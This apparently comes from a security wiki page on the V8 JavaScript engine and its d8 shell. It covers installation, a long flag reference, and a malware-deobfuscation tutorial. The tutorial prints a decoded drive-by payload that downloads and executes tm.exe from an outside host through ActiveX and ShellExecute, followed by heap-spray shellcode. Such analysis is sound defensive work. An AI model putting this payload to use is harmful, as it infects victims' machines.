V8

From aldeid
Jump to navigation Jump to search

Description

V8 is Google's open source JavaScript engine.

V8 is written in C++ and is used in Google Chrome, the open source browser from Google.

V8 implements ECMAScript as specified in ECMA-262, 5th edition, and runs on Windows (XP or newer), Mac OS X (10.5 or newer), and Linux systems that use IA-32, x64, or ARM processors.

Installation

$ cd /data/tools/
$ svn checkout http://v8.googlecode.com/svn/trunk/ v8
$ cd v8/
$ make dependencies
$ make native

Test that you can start d8: 

$ cd out/native/
$ ./d8 
V8 version 3.24.1 [console: dumb]
d8>

Usage

Syntax

Usage:
 shell [options] -e string
   execute string in V8
 shell [options] file1 file2 ... filek
   run JavaScript scripts in file1, file2, ..., filek
 shell [options]
 shell [options] --shell [file1 file2 ... filek]
   run an interactive JavaScript shell
 d8 [options] file1 file2 ... filek
 d8 [options]
 d8 [options] --shell [file1 file2 ... filek]
   run the new debugging shell

Options

--use_strict
enforce strict mode
type: bool
default: false
--es5_readonly
activate correct semantics for inheriting readonliness
type: bool
default: true
--es52_globals
activate new semantics for global var declarations
type: bool
default: true
--harmony_typeof
enable harmony semantics for typeof
type: bool
default: false
--harmony_scoping
enable harmony block scoping
type: bool
default: false
--harmony_modules
enable harmony modules
implies block scoping
type: bool
default: false
--harmony_symbols
enable harmony symbols (a.k.a. private names)
type: bool
default: false
--harmony_promises
enable harmony promises
type: bool
default: false
--harmony_proxies
enable harmony proxies
type: bool
default: false
--harmony_collections
enable harmony collections (sets, maps, and weak maps)
type: bool
default: false
--harmony_observation
enable harmony object observation
implies harmony collections
type: bool
default: false
--harmony_generators
enable harmony generators
type: bool
default: false
--harmony_iteration
enable harmony iteration (for-of)
type: bool
default: false
--harmony_numeric_literals
enable harmony numeric literals (0o77, 0b11)
type: bool
default: false
--harmony_strings
enable harmony string
type: bool
default: false
--harmony_arrays
enable harmony arrays
type: bool
default: false
--harmony_maths
enable harmony math functions
type: bool
default: false
--harmony
enable all harmony features (except typeof)
type: bool
default: false
--packed_arrays
optimizes arrays that have no holes
type: bool
default: true
--smi_only_arrays
tracks arrays with only smi values
type: bool
default: true
--compiled_keyed_dictionary_loads
use optimizing compiler to generate keyed dictionary load stubs
type: bool
default: true
--clever_optimizations
Optimize object size, Array shift, DOM strings and string +
type: bool
default: true
--pretenuring
allocate objects in old space
type: bool
default: true
--pretenuring_call_new
pretenure call new
type: bool
default: false
--allocation_site_pretenuring
pretenure with allocation sites
type: bool
default: false
--trace_pretenuring
trace pretenuring decisions of HAllocate instructions
type: bool
default: false
--track_fields
track fields with only smi values
type: bool
default: true
--track_double_fields
track fields with double values
type: bool
default: true
--track_heap_object_fields
track fields with heap values
type: bool
default: true
--track_computed_fields
track computed boilerplate fields
type: bool
default: true
--smi_binop
support smi representation in binary operations
type: bool
default: true
--optimize_for_size
Enables optimizations which favor memory size over execution speed.
type: bool
default: false
--unbox_double_arrays
automatically unbox arrays of doubles
type: bool
default: true
--string_slices
use string slices
type: bool
default: true
--crankshaft
use crankshaft
type: bool
default: true
--hydrogen_filter
optimization filter
type: string
default: *
--use_range
use hydrogen range analysis
type: bool
default: true
--use_gvn
use hydrogen global value numbering
type: bool
default: true
--use_canonicalizing
use hydrogen instruction canonicalizing
type: bool
default: true
--use_inlining
use function inlining
type: bool
default: true
--use_escape_analysis
use hydrogen escape analysis
type: bool
default: false
--use_allocation_folding
use allocation folding
type: bool
default: true
--max_inlining_levels
maximum number of inlining levels
type: int
default: 5
--max_inlined_source_size
maximum source size in bytes considered for a single inlining
type: int
default: 600
--max_inlined_nodes
maximum number of AST nodes considered for a single inlining
type: int
default: 196
--max_inlined_nodes_cumulative
maximum cumulative number of AST nodes considered for inlining
type: int
default: 400
--loop_invariant_code_motion
loop invariant code motion
type: bool
default: true
--fast_math
faster (but maybe less accurate) math functions
type: bool
default: true
--collect_megamorphic_maps_from_stub_cache
crankshaft harvests type feedback from stub cache
type: bool
default: true
--hydrogen_stats
print statistics for hydrogen
type: bool
default: false
--trace_check_elimination
trace check elimination phase
type: bool
default: false
--trace_hydrogen
trace generated hydrogen to file
type: bool
default: false
--trace_hydrogen_filter
hydrogen tracing filter
type: string
default: *
--trace_hydrogen_stubs
trace generated hydrogen for stubs
type: bool
default: false
--trace_hydrogen_file
trace hydrogen to given file name
type: string
default: NULL
--trace_phase
trace generated IR for specified phases
type: string
default: HLZ
--trace_inlining
trace inlining decisions
type: bool
default: false
--trace_load_elimination
trace load elimination
type: bool
default: false
--trace_alloc
trace register allocator
type: bool
default: false
--trace_all_uses
trace all use positions
type: bool
default: false
--trace_range
trace range analysis
type: bool
default: false
--trace_gvn
trace global value numbering
type: bool
default: false
--trace_representation
trace representation types
type: bool
default: false
--trace_escape_analysis
trace hydrogen escape analysis
type: bool
default: false
--trace_allocation_folding
trace allocation folding
type: bool
default: false
--trace_track_allocation_sites
trace the tracking of allocation sites
type: bool
default: false
--trace_migration
trace object migration
type: bool
default: false
--trace_generalization
trace map generalization
type: bool
default: false
--stress_pointer_maps
pointer map for every instruction
type: bool
default: false
--stress_environments
environment for every instruction
type: bool
default: false
--deopt_every_n_times
deoptimize every n times a deopt point is passed
type: int
default: 0
--deopt_every_n_garbage_collections
deoptimize every n garbage collections
type: int
default: 0
--print_deopt_stress
print number of possible deopt points
type: bool
default: false
--trap_on_deopt
put a break point before deoptimizing
type: bool
default: false
--trap_on_stub_deopt
put a break point before deoptimizing a stub
type: bool
default: false
--deoptimize_uncommon_cases
deoptimize uncommon cases
type: bool
default: true
--polymorphic_inlining
polymorphic inlining
type: bool
default: true
--use_osr
use on-stack replacement
type: bool
default: true
--array_bounds_checks_elimination
perform array bounds checks elimination
type: bool
default: true
--array_bounds_checks_hoisting
perform array bounds checks hoisting
type: bool
default: false
--array_index_dehoisting
perform array index dehoisting
type: bool
default: true
--analyze_environment_liveness
analyze liveness of environment slots and zap dead values
type: bool
default: true
--load_elimination
use load elimination
type: bool
default: true
--check_elimination
use check elimination
type: bool
default: false
--dead_code_elimination
use dead code elimination
type: bool
default: true
--fold_constants
use constant folding
type: bool
default: true
--trace_dead_code_elimination
trace dead code elimination
type: bool
default: false
--unreachable_code_elimination
eliminate unreachable code
type: bool
default: true
--track_allocation_sites
Use allocation site info to reduce transitions
type: bool
default: true
--trace_osr
trace on-stack replacement
type: bool
default: false
--stress_runs
number of stress runs
type: int
default: 0
--optimize_closures
optimize closures
type: bool
default: true
--lookup_sample_by_shared
when picking a function to optimize, watch for shared function info, not JSFunction itself
type: bool
default: true
--cache_optimized_code
cache optimized code for closures
type: bool
default: true
--flush_optimized_code_cache
flushes the cache of optimized code for closures on every GC
type: bool
default: true
--inline_construct
inline constructor calls
type: bool
default: true
--inline_arguments
inline functions with arguments object
type: bool
default: true
--inline_accessors
inline JavaScript accessors
type: bool
default: true
--loop_weight
loop weight for representation inference
type: int
default: 1
--escape_analysis_iterations
maximum number of escape analysis fix-point iterations
type: int
default: 2
--optimize_for_in
optimize functions containing for-in loops
type: bool
default: true
--opt_safe_uint32_operations
allow uint32 values on optimize frames if they are used only in safe operations
type: bool
default: true
--concurrent_recompilation
optimizing hot functions asynchronously on a separate thread
type: bool
default: true
--trace_concurrent_recompilation
track concurrent recompilation
type: bool
default: false
--concurrent_recompilation_queue_length
the length of the concurrent compilation queue
type: int
default: 8
--concurrent_recompilation_delay
artificial compilation delay in ms
type: int
default: 0
--block_concurrent_recompilation
block queued jobs until released
type: bool
default: false
--concurrent_osr
concurrent on-stack replacement
type: bool
default: false
--omit_map_checks_for_leaf_maps
do not emit check maps for constant values that have a leaf map, deoptimize the optimized code if the layout of the maps changes.
type: bool
default: true
--new_string_add
enable new string addition
type: bool
default: true
--frame_count
number of stack frames inspected by the profiler
type: int
default: 1
--interrupt_budget
execution budget before interrupt is triggered
type: int
default: 5888
--type_info_threshold
percentage of ICs that must have type info to allow optimization
type: int
default: 25
--self_opt_count
call count before self-optimization
type: int
default: 130
--trace_opt_verbose
extra verbose compilation tracing
type: bool
default: false
--debug_code
generate extra code (assertions) for debugging
type: bool
default: false
--code_comments
emit comments in code disassembly
type: bool
default: false
--enable_sse2
enable use of SSE2 instructions if available
type: bool
default: true
--enable_sse3
enable use of SSE3 instructions if available
type: bool
default: true
--enable_sse4_1
enable use of SSE4.1 instructions if available
type: bool
default: true
--enable_cmov
enable use of CMOV instruction if available
type: bool
default: true
--enable_sahf
enable use of SAHF instruction if available (X64 only)
type: bool
default: true
--enable_vfp3
enable use of VFP3 instructions if available
type: bool
default: true
--enable_armv7
enable use of ARMv7 instructions if available (ARM only)
type: bool
default: true
--enable_neon
enable use of NEON instructions if available (ARM only)
type: bool
default: true
--enable_sudiv
enable use of SDIV and UDIV instructions if available (ARM only)
type: bool
default: true
--enable_movw_movt
enable loading 32-bit constant by means of movw/movt instruction pairs (ARM only)
type: bool
default: false
--enable_unaligned_accesses
enable unaligned accesses for ARMv7 (ARM only)
type: bool
default: true
--enable_32dregs
enable use of d16-d31 registers on ARM - this requires VFP3
type: bool
default: true
--enable_vldr_imm
enable use of constant pools for double immediate (ARM only)
type: bool
default: false
--expose_natives_as
expose natives in global object
type: string
default: NULL
--expose_debug_as
expose debug in global object
type: string
default: NULL
--expose_gc
expose gc extension
type: bool
default: false
--expose_gc_as
expose gc extension under the specified name
type: string
default: NULL
--expose_externalize_string
expose externalize string extension
type: bool
default: false
--expose_trigger_failure
expose trigger-failure extension
type: bool
default: false
--stack_trace_limit
number of stack frames to capture
type: int
default: 10
--builtins_in_stack_traces
show built-in functions in stack traces
type: bool
default: false
--disable_native_files
disable builtin natives files
type: bool
default: false
--inline_new
use fast inline allocation
type: bool
default: true
--stack_trace_on_abort
print a stack trace if an assertion failure occurs
type: bool
default: true
--trace_codegen
print name of functions for which code is generated
type: bool
default: false
--trace
trace function calls
type: bool
default: false
--mask_constants_with_cookie
use random jit cookie to mask large constants
type: bool
default: true
--lazy
use lazy compilation
type: bool
default: true
--trace_opt
trace lazy optimization
type: bool
default: false
--trace_opt_stats
trace lazy optimization statistics
type: bool
default: false
--opt
use adaptive optimizations
type: bool
default: true
--always_opt
always try to optimize functions
type: bool
default: false
--always_osr
always try to OSR functions
type: bool
default: false
--prepare_always_opt
prepare for turning on always opt
type: bool
default: false
--trace_deopt
trace optimize function deoptimization
type: bool
default: false
--trace_stub_failures
trace deoptimization of generated code stubs
type: bool
default: false
--min_preparse_length
minimum length for automatic enable preparsing
type: int
default: 1024
--always_full_compiler
try to use the dedicated run-once backend for all code
type: bool
default: false
--max_opt_count
maximum number of optimization attempts before giving up.
type: int
default: 10
--compilation_cache
enable compilation cache
type: bool
default: true
--cache_prototype_transitions
cache prototype transitions
type: bool
default: true
--cpu_profiler_sampling_interval
CPU profiler sampling interval in microseconds
type: int
default: 1000
--trace_debug_json
trace debugging JSON request/response
type: bool
default: false
--trace_js_array_abuse
trace out-of-bounds accesses to JS arrays
type: bool
default: false
--trace_external_array_abuse
trace out-of-bounds-accesses to external arrays
type: bool
default: false
--trace_array_abuse
trace out-of-bounds accesses to all arrays
type: bool
default: false
--debugger_auto_break
automatically set the debug break flag when debugger commands are in the queue
type: bool
default: true
--enable_liveedit
enable liveedit experimental feature
type: bool
default: true
--break_on_abort
always cause a debug break before aborting
type: bool
default: true
--stack_size
default size of stack region v8 is allowed to use (in kBytes)
type: int
default: 492
--max_stack_trace_source_length
maximum length of function source code printed in a stack trace.
type: int
default: 300
--always_inline_smi_code
always inline smi code in non-opt code
type: bool
default: false
--max_new_space_size
max size of the new generation (in kBytes)
type: int
default: 0
--max_old_space_size
max size of the old generation (in Mbytes)
type: int
default: 0
--max_executable_size
max size of executable memory (in Mbytes)
type: int
default: 0
--gc_global
always perform global GCs
type: bool
default: false
--gc_interval
garbage collect after <n> allocations
type: int
default: -1
--trace_gc
print one trace line following each garbage collection
type: bool
default: false
--trace_gc_nvp
print one detailed trace line in name=value format after each garbage collection
type: bool
default: false
--trace_gc_ignore_scavenger
do not print trace line after scavenger collection
type: bool
default: false
--print_cumulative_gc_stat
print cumulative GC statistics in name=value format on exit
type: bool
default: false
--print_max_heap_committed
print statistics of the maximum memory committed for the heap in name=value format on exit
type: bool
default: false
--trace_gc_verbose
print more details following each garbage collection
type: bool
default: false
--trace_fragmentation
report fragmentation for old pointer and data pages
type: bool
default: false
--trace_external_memory
print amount of external allocated memory after each time it is adjusted.
type: bool
default: false
--collect_maps
garbage collect maps from which no objects can be reached
type: bool
default: true
--weak_embedded_maps_in_optimized_code
make maps embedded in optimized code weak
type: bool
default: true
--weak_embedded_objects_in_optimized_code
make objects embedded in optimized code weak
type: bool
default: true
--flush_code
flush code that we expect not to use again (during full gc)
type: bool
default: true
--flush_code_incrementally
flush code that we expect not to use again (incrementally)
type: bool
default: true
--trace_code_flushing
trace code flushing progress
type: bool
default: false
--age_code
track un-executed functions to age code and flush only old code (required for code flushing)
type: bool
default: true
--incremental_marking
use incremental marking
type: bool
default: true
--incremental_marking_steps
do incremental marking steps
type: bool
default: true
--trace_incremental_marking
trace progress of the incremental marking
type: bool
default: false
--track_gc_object_stats
track object counts and memory usage
type: bool
default: false
--parallel_sweeping
enable parallel sweeping
type: bool
default: true
--concurrent_sweeping
enable concurrent sweeping
type: bool
default: false
--sweeper_threads
number of parallel and concurrent sweeping threads
type: int
default: 0
--heap_profiler_trace_objects
Dump heap object allocations/movements/size_updates
type: bool
default: false
--use_idle_notification
Use idle notification to reduce memory footprint.
type: bool
default: true
--use_ic
use inline caching
type: bool
default: true
--native_code_counters
generate extra code for manipulating stats counters
type: bool
default: false
--always_compact
Perform compaction on every full GC
type: bool
default: false
--lazy_sweeping
Use lazy sweeping for old pointer and data spaces
type: bool
default: true
--never_compact
Never perform compaction on full GC - testing only
type: bool
default: false
--compact_code_space
Compact code space on full non-incremental collections
type: bool
default: true
--incremental_code_compaction
Compact code space on full incremental collections
type: bool
default: true
--cleanup_code_caches_at_gc
Flush inline caches prior to mark compact collection and flush code caches in maps during mark compact cycle.
type: bool
default: true
--use_marking_progress_bar
Use a progress bar to scan large objects in increments when incremental marking is active.
type: bool
default: true
--random_seed
Default seed for initializing random generator (0, the default, means to use system random).
type: int
default: 0
--use_verbose_printer
allows verbose printing
type: bool
default: true
--allow_natives_syntax
allow natives syntax
type: bool
default: false
--trace_parse
trace parsing and preparsing
type: bool
default: false
--trace_sim
Trace simulator execution
type: bool
default: false
--check_icache
Check icache flushes in ARM and MIPS simulator
type: bool
default: false
--stop_sim_at
Simulator stop after x number of instructions
type: int
default: 0
--sim_stack_alignment
Stack alingment in bytes in simulator (4 or 8, 8 is default)
type: int
default: 8
--abort_on_uncaught_exception
abort program (dump core) when an uncaught exception is thrown
type: bool
default: false
--trace_exception
print stack trace when throwing exceptions
type: bool
default: false
--randomize_hashes
randomize hashes to avoid predictable hash collisions (with snapshots this option cannot override the baked-in seed)
type: bool
default: true
--hash_seed
Fixed seed to use to hash property keys (0 means random)(with snapshots this option cannot override the baked-in seed)
type: int
default: 0
--profile_deserialization
Print the time it takes to deserialize the snapshot.
type: bool
default: false
--regexp_optimization
generate optimized regexp code
type: bool
default: true
--testing_bool_flag
testing_bool_flag
type: bool
default: true
--testing_maybe_bool_flag
testing_maybe_bool_flag
type: maybe_bool
default: unset
--testing_int_flag
testing_int_flag
type: int
default: 13
--testing_float_flag
float-flag
type: float
default: 2.500000
--testing_string_flag
string-flag
type: string
default: Hello, world!
--testing_prng_seed
Seed used for threading test randomness
type: int
default: 42
--testing_serialization_file
file in which to serialize heap
type: string
default: /tmp/serdes
--extra_code
A filename with extra code to be included in the snapshot (mksnapshot only)
type: string
default: NULL
--profile_hydrogen_code_stub_compilation
Print the time it takes to lazily compile hydrogen code stubs.
type: bool
default: false
--help
Print usage message, including flags, on console
type: bool
default: true
--dump_counters
Dump counters on exit
type: bool
default: false
--debugger
Enable JavaScript debugger
type: bool
default: false
--remote_debugger
Connect JavaScript debugger to the debugger agent in another process
type: bool
default: false
--debugger_agent
Enable debugger agent
type: bool
default: false
--debugger_port
Port to use for remote debugging
type: int
default: 5858
--map_counters
Map counters to a file
type: string
default:
--js_arguments
Pass all remaining arguments to the script. Alias for "--".
type: arguments
default:
--debug_compile_events
Enable debugger compile events
type: bool
default: true
--debug_script_collected_events
Enable debugger script collected events
type: bool
default: true
--gdbjit
enable GDBJIT interface (disables compacting GC)
type: bool
default: false
--gdbjit_full
enable GDBJIT interface for all code objects
type: bool
default: false
--gdbjit_dump
dump elf objects with debug info to disk
type: bool
default: false
--gdbjit_dump_filter
dump only objects containing this substring
type: string
default:
--force_marking_deque_overflows
force overflows of marking deque by reducing it's size to 64 words
type: bool
default: false
--stress_compaction
stress the GC compactor to flush out bugs (implies --force_marking_deque_overflows)
type: bool
default: false
--log
Minimal logging (no API, code, GC, suspect, or handles samples).
type: bool
default: false
--log_all
Log all events to the log file.
type: bool
default: false
--log_runtime
Activate runtime system %Log call.
type: bool
default: false
--log_api
Log API events to the log file.
type: bool
default: false
--log_code
Log code events to the log file without profiling.
type: bool
default: false
--log_gc
Log heap samples on garbage collection for the hp2ps tool.
type: bool
default: false
--log_handles
Log global handle events.
type: bool
default: false
--log_snapshot_positions
log positions of (de)serialized objects in the snapshot.
type: bool
default: false
--log_suspect
Log suspect operations.
type: bool
default: false
--prof
Log statistical profiling information (implies --log-code).
type: bool
default: false
--prof_browser_mode
Used with --prof, turns on browser-compatible mode for profiling.
type: bool
default: true
--log_regexp
Log regular expression execution.
type: bool
default: false
--logfile
Specify the name of the log file.
type: string
default: v8.log
--logfile_per_isolate
Separate log files for each isolate.
type: bool
default: true
--ll_prof
Enable low-level linux profiler.
type: bool
default: false
--perf_basic_prof
Enable perf linux profiler (basic support).
type: bool
default: false
--perf_jit_prof
Enable perf linux profiler (experimental annotate support).
type: bool
default: false
--gc_fake_mmap
Specify the name of the file for fake gc mmap used in ll_prof
type: string
default: /tmp/__v8_gc__
--log_internal_timer_events
Time internal events.
type: bool
default: false
--log_timer_events
Time events including external callbacks.
type: bool
default: false
--redirect_code_traces
output deopt information and disassembly into file code-<pid>-<isolate id>.asm
type: bool
default: false
--redirect_code_traces_to
output deopt information and disassembly into the given file
type: string
default: NULL

Example

Let's analyze an obfuscated JavaScript: 

$ ./d8 -f /data/tmp/malware/storm.js 
/data/tmp/malware/storm.js:1: ReferenceError: document is not defined
\xc6\xc0\x9c\x9d\x8f\xbe"; var xored_str = xor_str(plain_str, 180); document.w
                                                                    ^
ReferenceError: document is not defined
    at /data/tmp/malware/storm.js:1:29777

As you can see, d8 does not know the document.write method. To fix this, we need to provide d8 with a custom definition script: 

$ cat def.js 
document = {
    write:print,
    writeln:print
};
eval = function(input_string) {
    print(input_string);
}
Note
For a more complete def.js file, you can refer to the one written by Lenny Zeltser: def.js

Now, d8 should be able to deobfuscate our code: 

$ ./d8 -f /data/tmp/def.js -f /data/tmp/malware/storm.js | indent
var xd =
  "var x = new ActiveXObject('Mic'+'ros'+'oft.X'+'MLHTTP');x.Open('GET','http://tibeam.com/file.php',0);x.Send();var s=new ActiveXObject('ADODB.Stream');s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile('../tm.exe',2); ";
ed = escape (xd);
var url =
  'res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript%20language%3D%27jscript%27%3Ea%3Dnew%20ActiveXObject%28%27Shell.Application%27%29%3B'
  + ed +
  'a.ShellExecute%28%27../tm.exe%27%29%3B%3C/script%3E%3C%21--//%7C0%7C0%7C0%7C0%7C0%7C0%7C0%7C0';
document.location = url;

var mm = new Array ();
var mem_flag = 0;

function
h ()
{
  mm = mm;
  setTimeout ("h()", 2000);
}

function
getb (b, bSize)
{
  while (b.length * 2 < bSize)
    {
      b += b;
    }
  b = b.substring (0, bSize / 2);
  return b;
}

function
cf ()
{
  var zc = 0x0c0c0c0c;
  var a = unescape ("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
		    "%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb"
		    +
		    "%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7"
		    +
		    "%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96"
		    +
		    "%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85"
		    +
		    "%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa"
		    +
		    "%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf"
		    +
		    "%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc"
		    +
[SNIP]

Comments

Retrieved from "https://www.aldeid.com/w/index.php?title=V8&oldid=34948"